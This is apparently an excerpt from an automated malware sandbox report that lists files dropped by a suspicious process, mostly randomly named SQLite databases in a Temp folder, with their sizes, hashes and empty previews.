SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tVfIYY6CrX

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tYD2WIHGr2

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tlpTkjDiOY

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\uUJlpAtfSQ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\unmqDrOpsl

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\upeFTdTQDG

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vnrsI15eDZ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\w4AUonkKbY

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wLGtp3r75P

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wsFwYyoWAc

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wtiiG1yHOo

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xK8xHfQyQ9

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xq1hsqd1I6

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xqMwd6mr9g

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yBossguzsz

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yG8nGIuS2j

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yLFVuHhrRC

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yYgSKwkhMw

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ycD4ouEQvK

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yrXh7kZTCk

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zYiYHC0rU3

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zjcgEPX0mv

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zlUoSh7hqK

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zwC2c6ItK4

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zyUEzyyfpc

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\DISCORD

Download File

Process:	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	103
Entropy (8bit):	3.9770111444684244
Encrypted:	false
SSDEEP:	3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm
MD5:	487AB53955A5EA101720115F32237A45
SHA1:	C59D22F8BC8005694505ADDEF88F7968C8D393D3
SHA-256:	D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368
